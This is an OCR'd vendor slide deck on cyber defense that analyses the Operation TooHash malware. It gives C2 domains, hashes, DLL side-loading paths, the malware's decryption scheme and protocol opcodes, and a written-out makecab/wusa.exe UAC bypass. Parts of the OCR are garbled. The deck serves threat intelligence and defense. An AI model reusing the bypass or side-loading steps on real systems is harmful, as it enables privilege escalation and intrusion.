An Intelligence-Driven Approach to Cyber Defense Peikan Tsung(PkK) Chief Cyber Researcher Verint Systems(Taiwan) VERINT Table of Content ° Traditional Cyber Security ° Low visibility of Cyber Threats * Fileless Malware Attacks * Bypass Sign Check ° Operation TooHash(H2) Evolution ¢ Indicator to Intelligence ° From Cyber Security To Cyber Defense File to Fileless Abnormal to Normal Malicious to Neutral TRADITIONAL STATIC SECURITY APPROACHES AND ARCHITECTURES BASED ON SECURITY CONTROLS, PREVENTATIVE TECHNOLOGIES AND PERIODIC STRATEGY REVIEWS ARE NOW OUTDATED VERINT. Traditional Cyber Security(1/5) Privilege management Tid) (417) WIN-ICR1F40XXXX VERINT. © 2016 Verint systems inc. All rights reserved worldwide File Guard 4! Traditional Cyber Security(2/5) Privilege management NG-Firewall WIN-ICR1F40XXXX VERINT. © 2016 Verint systems inc. All nights reserved worldwide Fire Guard (XII) [414T) CXId) (41 5> Traditional Cyber Security(3/5) Privilege management NG-Firewall VERINT. © 2016 Verint systems inc. All rights reserved worldwide File Guard 6° Traditional Cyber Security(4/5) agement VERIN T. : inc. All nghts reserved worldwide Traditional Cyber Security(5/5) SIEM ® GoogleDrive DropBox Blo Abnormality Detected VERIN T. Uro verint systems inc. All nghts reserved worldwide © 2016 Verint systems inc. All rights reserved worldwide 9 • Invisible Attacks • VPN, AD, PtH, PtT • Invisible Network Traffic • Google Drive, Dropbox • Invisible Malware • Task schedule, Wmi , Powershell Low visibility of Cyber Threats © 2016 Verint systems inc. All rights reserved worldwide 10 • As seen from the script or fileless malware, they begin to increase dramatically. And the PowerShell can be embedded in a macro and then into a document file in various forms. • The leverage of PowerShell or wmi which both built-in in windows system are often used in post-exploitation activities so the fileless threats will be more and more. Fileless malware attacks © 2016 Verint systems inc. All rights reserved worldwide 11 • The following elegant PowerShell can achieve three things in one line: • Detect the architecture (check against the size of the IntPtr object type: x86 or x64bit). • Download binary from website. • Directly run the binary on the fly (use iex command). • Invoke-Expression(iex), Runs commands or expressions on the local computer. You can install the back door just in one PS line • The malicious program is Self-Signed. But hacker added it to the trusted root chain. So the victim will always verify this as valid signature. 12 Import Self-Signed Certificate to Bypass Sign Check VERINT. TARGETED CYBER ATTACK ON COMPANIES AND ORGANIZATIONS TooHash(H2) Evoluti n a NA 28 7p1S(S:Mon Apr 11 18:29:59 CST 2016 ° ° SCS: RSBRB 105 4A 25 BA BhShisitaaR An eme rge n cy n otifi catio n fro m ee ee er ea €6the laiWan National CERI, asked all I 105 4A 25 BAIS ' SSRRSRB AA (https://spm.nat. 2 iinmiaen ces: the government agencies to check 3: 'SSGRSNOGAR, ARUABEMA 105 441483 whether they infected a specific ARs 1. SSTUMSRBERMRSE NHR ARA — backdoor. st) BAS ESS RMA - 2. SR SRREGR HRESBASAMBRAN — eectonretc Het As (https://spm.nat.gov.tw/ALTRP) HBS Analysis date: 2016-03-31 16.08:26 UTC { 8 months ago ) EAN) - ARENAS MT - 17 / 56 (FR) SRsee (SSR) [Analysis @File detail © @ Additional information gComments @P Votes (1)Ad-Aware [Trojan.Generic.16214082 } (3)Antiy-AVL { Trojan[Dropper]/Win32.Agent]} Anevirus Result wate (4)Arcabit { Trojan.Generic.DF76842 } iis ai TEER PP ORINGE GEM sisal (5)Avast {Win32:Malware-gen] Antiy-AVL Trojan[Dropper}/Win32 Agent 201603314 } Avast Win32:Malware-gen 20160331 ()Avira//\Z14 [TR/Agent.41984 - TR/Agentyiny] Avira (no cious) TR/Agent.yiny 20160331 (8)BitDefender (Trojan.Generic.16214082 } DrWeb Trojan MulDrop8 16228 20160331 (9)DrWeb/A#18 [ Trojan.MulDrop6.16228 } ESET-NOD32 a vanant of Win32/Agent.XSL 20160331 (10)Emsisoft, { Trojan.Generic.16214082 (B) ] | ZU 10 Vernnt SyStems inc. All ngnis reserved worldwide 14 • TMPolicy (2) .dll is pretending to be msisip.dll • F:\MyProject\msisip\Release\NvSmartMax.pdb • DLL entry points, and all exported APIs only do one thing • WinExec ("tmpolicy.dll", 0) • TMPolicy (1) .dll The original name is tmpolicy.dll • Actually TMPolicy (1) .dll is a PE file(tmpolicy.dll). Sample_NICT.rar Overview 15 TMPolicy Sample Overview • The malware will determine whether it’s in the 32-bit or 64-bit windows version and generate the different payload with dll to bypass the security check. • In Windows XP will drop srvlic.dll + fake file • In Windows 7 will drop msTracer.dll + fake file • Fake file is actually a real backdoor module and is usually dropped to : • C:\Documents and Settings\All Users\Application Data\Windows CE\ directory. • C2 Connections : • help.adobeservice.net:80;help.adobeservice.net:8080; • assist.adobeservice.net:443;assist.adobeservice.net:1863; 16 Running on x86 Windows XP • How C:\WINDOWS\system32\srvlic.dll be executed? 17 Running on x86 Windows XP • One of svchost.exe will load srvsvc.dll, and srvsvc.dll tries to load srvlic.dll when LoadLicensingLibrary () is called • C:\Windows\system32\srvlic.dll (Actually, this file does not exist in the system) • The fake srvlic.dll will be loaded by DLL side-loading / path hijacking tricks. • When srvlic.dll is loaded, it will try to read the file "fake" and decrypt as a module file. • The decrypted fake file will be copied to a new memory block, so the srvlic.dll can not be observed by the process explorer. 18 Dll file has been mapped to memory blocks 19 Dll file has been mapped to memory blocks 20 Running on x64 Windows 7(1/2) • Run TMPolicy.exe 1. Drop C:\ProgramData\temp0 file and move to C:\Users\\AppData\Local\Temp\msTracer.dll 2. Move C:\Users\\AppData\Local\Temp\msTracer.dll file to C:\Windows\system32 (theoretically can not be moved to this path, restricted by UAC) 3. When msTracer.dll is loaded, it will try to read the file "fake" and decrypt as a module file C:\ProgramData\Windows CE\fake 4. Create a batch file to eliminate all files 21 Running on x64 Windows 7(2/2) • SearchIndexer.exe is a Windows Service (WSearch), and it will try to load msfte.dll when loadTracerDLL is called, and if it fails, it will to try to load msTracer.dll. • SearchProtocolHost.exe also has the same vulnerability(Dll Side-loading). • When msTracer.dll is loaded, it will try to read the file "fake" and decrypt as a module file. 22 Bypass UAC on Windows 7(1/3) • But TMPolicy.exe can not move msTracer.dll to system32 because it is protected by UAC. • So, how to place files in system protected areas without triggering UAC? 23 https://github.com/hfiref0x/UACME Bypass UAC on Windows 7(2/3) • Bypass the UAC restrictions • makecab.exe /V1 "C:\Users\\AppData\Local\Temp\msTracer.dll" "C:\Users\\AppData\Local\Temp\msTracer.dll.msu“ • wusa.exe /quiet "C:\Users\\AppData\Local\Temp\\msTracer.dll.msu" /extract:C:\Windows\system32 24 Bypass UAC on Windows 7(3/3) • wusa.exe : Windows Update Standalone Installer • Wusa method, tweaked to work from Windows 7 up to 10th1 10136 25 Encryption/Decryption of fake(1/4) • Each running of TMPolicy.exe will generate different fake files, but after decryption , the contents are all the same. • Fake file content = 4Byte Secret Key + Encrypted Content • Secretkey is generated by rand () function. 26 Encryption/Decryption of fake(2/4) • Secret Key: First 4 Byte • Cipher = ENCRYPT(Plain, Secret_Key) • Plain = DECRYPT(Cipher, Secret_Key) • Reduced Sequence: 128 Bytes table 27 reduced_sequece = [ 0x03, 0x05, 0x06, 0x07, 0x0A, 0x0C, 0x0E, 0x13, 0x14, 0x18, 0x1B, 0x1C, 0x21, 0x25, 0x26, 0x27, 0x28, 0x29, 0x2B, 0x2D, 0x2F, 0x30, 0x33, 0x35, 0x36, 0x37, 0x38, 0x3F, 0x41, 0x42, 0x45, 0x47, 0x4A, 0x4B, 0x4C, 0x4D, 0x4E, 0x50, 0x52, 0x53, 0x55, 0x56, 0x57, 0x5A, 0x5B, 0x5D, 0x5E, 0x60, 0x61, 0x65, 0x66, 0x67, 0x69, 0x6A, 0x6B, 0x6C, 0x6D, 0x6E, 0x70, 0x73, 0x77, 0x7D, 0x7E, 0x7F, 0x82, 0x83, 0x84, 0x8A, 0x8E, 0x91, 0x93, 0x94, 0x95, 0x96, 0x97, 0x98, 0x9A, 0x9B, 0x9C, 0xA0, 0xA1, 0xA3, 0xA4, 0xA6, 0xA7, 0xAA, 0xAB, 0xAC, 0xAE, 0xAF, 0xB1, 0xB3, 0xB4, 0xB5, 0xB6, 0xB7, 0xBA, 0xBC, 0xBF, 0xC0, 0xC2, 0xC9, 0xCA, 0xCB, 0xCC, 0xCE, 0xD1, 0xD2, 0xD4, 0xD6, 0xD8, 0xD9, 0xDA, 0xDB, 0xDC, 0xE0, 0xE5, 0xE6, 0xE9, 0xED, 0xEE, 0xF3, 0xF5, 0xF7, 0xFA, 0xFB, 0xFC, 0xFE, ] Encryption/Decryption of fake(3/4) 1. Calculate Chosen Sequence: 4 Bytes • chosen_sequence[ i ] = reduced_sequece[ secret_key[ i ] % 128] 2. Build First Secret Map: 256 Bytes • first_secret_map = [ 0, 1, 2, ... , 255 ] 3. Choice chosen_sequence[ 0 ] ~ chosen_sequence[ 4 ] • first_secret_map rearranged four times with chosen_sequence[0-4] • Build Second Secret Map: 256 Bytes • second_secret_map[ first_secret_map[ i ] ] = i 28 Encryption/Decryption of fake(4/4) • Encryption(substitution ), through the second_secret_map • encrypted_data [ i ] = second_secret_map[ original_data[ i ] ] • Decryption(substitution ), through the reversed_second_secret_map • reversed_second_secret_map[ second_secret_map[ i ] ] = i decrypted_data[ i ] = reversed_second_secret_map[ encrypted_data[ i ] ] 29 Connection Protocol between C2 Server(1/3) e C2 sends command to fake ¢ SIZE = total size of command — 4 ¢ MAGIC, OPCODE1, OPCODE2, PAYLOAD are encrypted using SECRET_KEY SIZE[4] SECRET_KEY[ MAGIC[4] OPCODE1[4] | OPCODE2[4] PAYLOAD 4] ° Fake sends response back to C2 ¢ SIZE = total size of response — 4 ¢ MAGIC, PAYLOAD are encrypted using SECRET_KEY SIZE[4] SECRET_KEY[4]] MAGIC[4] PAYLOAD VERINT. © 2016 Verint systems inc. All rights reserved worldwide Connection Protocol between C2 Server(2/3) ° If opcode1 == 0x3254BFD2 and opcode2 == Ox6FF39/17 > ExecCmd_LoadLibrary * Command SIZE[4] SECRET_KEY[4] MAGIC[4] @x3254BFD2 @x6FF39717 NAME_LEN[4] NAME[NAME_LEN*2] e Response SIZE[4] SECRET_KEY[4] MAGIC[4] MESSAGE_LEN[4] MESSAGE [MESSAGE_LEN*2] RETCODE[1] VERIN 7 ° © 2016 Verint systems inc. All rights reserved worldwide Connection Protocol between C2 Server(3/3) ° If opcode1 == 0x22836D/73 and opcode2 == Ox6F42E3C0 > ExecCmd_GetPlatformBits ¢ Command SIZE[4] SECRET_KEY[4] MAGIC[4] @x22836D73 @x6F42E3CO ¢ Response SIZE[4] SECRET_KEY[4] MAGIC[4] MESSAGE_LEN[4] MESSAGE[MESSAGE_LEN*2] OxFFFFFFFFFFFFFFFF 0xe0e000003 "*X' 08 '8' 00 '6' 00 8xe8e08000 or '*x' 06 '6' 08 '4' CO VERIN 7 ° © 2016 Verint systems inc. All rights reserved worldwide C:\ProgramData\tempo DLL (GUI) Hidden File APT Malware “ia Nam BUILTINVAdministrators File MDS _fb4a0fdb2cOafSb80e1f52b1bc3a375a File Size 74 KB (75776 Bytes) Create Time 2015-11-05 21:49:26 Last Access 2015-11-18 23:27:59 Last Write 2015-11-18 23:27:59 Time Stamp 2014-12-11 09:11:11 Alias « C:\WINDOWS\SYSTE! '32\MSTRACER. DLL Me f j =u NE94731F308 /\ UPDATE ADOBESERVICE NET wh PROXDOMAIN. / ‘ ih \ / / A\ a \ SR / A \ ~ Ss pwivadoneseRvice; NET Sy prox ENET \ rosoezdog4@a0 COM | Anode SeRyICE Net Searchindexer.exe “am32\Searchindexer.exe [32] [PID: 3600] 2016-10-26 20:34:47 _C:\Windot croror0250 | enero [ol Code/DLL Injection APT Malware @ help.adobeservice.net NCCU.PROX a / ota atl | hele — + SERVICE NEB ator ADOBESERVICE NET F assist.adobeservice.net _adjust_fdiv _initterm 2014-12 - {22719ab1f830dfa27c598e7 1e8ae7e5 EX28%z.xls (CVE-2012-0158) intermain: loadpath7 loadpathsv 1 | help adobeservice net: 1863-help adobeservice net:S080-assist_adobeservice net:443-assist adobeservice net:80: / / N15 | fi ON 9 TEST3\"* © 2016 Verint systems inc. All rights reserved worldwide 34 • 03/11/2014 G DATA SecurityLabs have discovered a spyware campaign. Operation TooHash is a targeted cyber attack on companies and organizations. The aim of the attack is to steal sensitive information from the targeted companies. Using a "spear-phishing" approach” • 2013~ 2014-01-06 • 8d263d5dae035e3d97047171e1cbf841 (102年尾牙、103年春酒精緻菜單.xls) • 7251073c67db6421049ee2baf4f31b62 (李辉简历.doc) • 2ec306ef507402037e9c1eeb81276152 (文件列表.xls) • 6b83319cf336179f2105999fe586242c (Wo.doc) • C2: • *.cnnic-micro.com , *.adobeservice.net, *.intarnetservice.com.,etc Operation TooHash (H2) © 2016 Verint systems inc. All rights reserved worldwide 35 • Hash Values • 650C58E995A471FA4BE6C49A32F7899B • 4DBD68D3741D46170D2585AAE4336B80 • IP Address • Domain Names • help.adobeservice.net • help.adobeservice.net • Network/Host Artifacts • En/Decode Algorithm, Strings • Connection Protocol, User-agent • Tools • TMPolicy.exe • TTPs • Spearphishing email • UAC bypass, wusa.exe • Deploy through Anti-Virus • Dll-Slde loading Indicator of New OperationTooHash ATT&CK Matrix Privilege Defense Credential : Lateral : : Command and rersiviines Discovery Execution Collection Exfiltration Escalation Evasion Access Movement Control ae a Application ' Accessibility |Accessibility ‘ : Account Command-Line {Automated Automated Commonly Binary Padding |Brute Force . Deployment ; Features Features Discovery Interface Collection Exfiltration Used Port Software — Communication ; Application sy as : : : ‘ Bypass User Credential ‘ Exploitation of |Execution Clipboard Data Through Appinit DLLs = |Appinit DLLs . Window 7 Account Control |Dumping ; Vulnerability /through API Data Compressed /|Removable Discovery ; Media Basic Bypass User ; File and : : < Credential ; ; Graphical User Data Connection Input/Output |Account Code Signing : ; Directory Logon Scripts Data Staged Manipulation . Interface Encrypted Proxy System Control Discovery Custom __ |Local Network ‘ — Component Credentials in : : Data from Data Transfer |Command and Bootkit DLL Injection |_. : Configuration |Pass the Hash |InstallUtil : — Firmware Files , Local System |Size Limits Control Discovery Protocol Exfiltration Change Default|DLL Search |Component —_— Local Network Data from Custom : 5 Exploitation of : Pass the Over : File Order Object Model ers Connections PowerShell Network : Cryptographic — oo. a oxes Vulnerability . Ticket . Alternative Association Hijacking Hijacking Discovery Shared Drive peciaael Protocol https://attack.mitre.org/~’ ATT&CK Groups Group ¢,| Aliases ¢ Description APT1 Comment Crew APT1 Comment Group Comment Panda APT12 IXESHE APT12 DynCalc APT12 is a threat group that has been attributed to China.!2! It is also known as DynCalc, IXESHE, and Numbered Panda.!°Il2! Numbered Panda Ald APT1 is a Chinese threat group that has been attributed to the 2nd Bureau of the People’s Liberation Army (PLA) General Staff Department's (GSD) 3rd Department, commonly known by its Military Unit Cover Designator (MUCD) as Unit 61398.{"] APT16 APT16 APT16 is a China-based threat group that has launched spearphishing campaigns targeting Japanese and Taiwanese organizations."“! APT17 APT17 is a China-based threat group that has conducted network intrusions against U.S. government entities, the defense industry. Deputy Dog _law firms, information technology companies, mining companies, and non-government organizations.!°! APT18 Threat Group- N 0416 APT 18 is a threat group that has operated since at least 2009 and has targeted a range of industries, including technology, TG-0416 manufacturing, human rights groups, government. and medical. [©] Dynamite Panda https://attack.mitre.org/ APT17 APT18 Data(@ik - SABEMEA')-> Intelligence(#e RANE) Pyramid of Pain ns — Strategic / Tools *Challenging k : | Benes _ Annoying Tactical DomainNames eSimple *Easy Operational eTrivial http://detect-respond.blogspot.com/2013/03/the-pyramid-of-pain.html VERINT. © 2016 Verint systems inc. All rights reserved worldwide 39 28751 i:Mon Apr 11 18:29:59 CST 2016 SHt+S:eomK 105 #4 A 25 BABS RieThaR B.A SHH: SSRIS iSKkinst WeARMAaSHARA KS 105 £45 25 AAS ' SSRRSASRAA(https://spm.nat.gov| 5 (WABMSiskiwar - a: ' 2S RRSAORARS ARH 1. BEHHSRELRMAS Ht) BRA ZhShism 2. mikstistieak Rc Laas ahsrink Zana pe ASEIb Fc floccreralcens be ALTO Sta) > haSRish 2b : (FD) SRisee (SSRA MAR) Ad-Aware [Trojan.Generic.16214082 } (3)Antiy-AVL (Trojan[Dropper]/Win32.Agent] (4)Arcabit [Trojan.Generic.DF76842 ] Af2ATM FPERA A 5 RRA BRM : —ERATMS Sat GRBs (ORE AREA RES AHRRD PRE Ettis Py Sere ATMay Stik “@ASEAz ie eee, | CsEAA, BERS RATER) wincorighe > 293% pro cé — BS AHATME BAS BBE ‘cnginfo.exe, (HE BZ) » “engdisp.exe, R# Hay “cngdisp_new.exe, (aE SHAT ‘delete.exe, (WHE RMRERM) — R131 ‘cleanup.bat, (ALL cngdisp.exe Ecnginfo.exemi=n) HBEHC ESS SHiets ME (RRB ETH) 1 Be BRE. RASA: BS (5)Avast [Win32:Malware-gen } (6)AVG [Agent5.AMAO] (Avira//|\Z14 [TR/Agent.41984 ~ TR/Agentyiny] (8)BitDefender [ Trojan.Generic.16214082 } (9)DrWeb/A#¢t [Trojan.MulDrop6.16228 } \ aE soft Pies Goreacrez aces ai / ee eX fi ZATM ie BEBE are anise * RHR Bia Wes BBNAIMEKERERHS AHR R: Bw z wifi ‘HZUMRSREN : R-RRASE BRSR DEBE RES MRAM SSNSSiter Kk BATES REREIR - worldwide 40 St ome RES? © 2016 Verint systems inc. All rights reserved worldwide 41 Machine-readable threat intelligence Not able to generate IOCs able to generate IOCs Closed threat intelligence (organization) Intelligence Providers Open Source Commercial Intelligence : threat [OSINT] = intelligence Computer Emergency 4 Js >= - Closed threat Response intelligence eams [CERT VERINT. © 2016 Verint systems inc. All nghts reserved worldwide 42 Evolving From Cyber Security To Cyber Defense From Being Hunted To Being Hunters ite automated ‘ ca) analytics Limited to one attack vector Aggregates logs; no analysis Only ‘knowns’ ae Advanced Threat Advanced SIEM 2.0 Defense Threat Detection ; SIEM Perimeter Signature-based TIME. oversee Qi errr tetecttceee Qn tectteeeneennaans Qc eceeeeteetnnnaas Ce occa Qo Policy Compliance; Single Threat Visibility; Connect logs with Integration, Need Enforcement Pane of Glass Detect “unknowns” NW, Endpoint Analytics & VE \ /) Automation ATTACKERS HAVE MULTIPLE ROUTES TO REACH THEIR TARGET Organizations Need To Look Across The kill Chain J © 2016 Verint systems inc. All rights reserved worldwide 44 The Need For A Unified & Automated Cyber Intelligence Solution Too many point products $70 billion spent on IT security; Focused on single attack vectors Over 80% of organizations breached Too many alerts 17,000 malware alerts a week, of which Only 4% of alerts are investigated only 19% are considered reliable Not enough solid insights aoe of Cyber Analysts to reach 1.5M days-weeks to investigate Can’t make sense of the noise & takes Sources: CyberSecurity Ventures, Cybersecurity Market Report, December 2015 Ponemon Institute, Cost of Malware Containment, January 2015 VERINT. © 2016 Verint systems inc. All rights reserved worldwide 45 ’ Ed Few Incidents é ... BRAIN uv Ware APT. automated ~* VU | MAY ZF ( detection = investigation Verint makes sense of the data to glean insights for superior cyber intelligence VERIN T. © 2016 Verint systems inc. All rights reserved worldwide 46 Automated & Orchestrated Cyber Intelligence 47 Comprehensive = Active + Passive Monitoring Multiple Dimensions= Network + EndPoint forensics + Files Analysis Automated Analysis= Intelligence-Oriented Analysis+ Machine Learning Visualization = Unified Investigation Platform Thank You FOR LESSENING VERINT.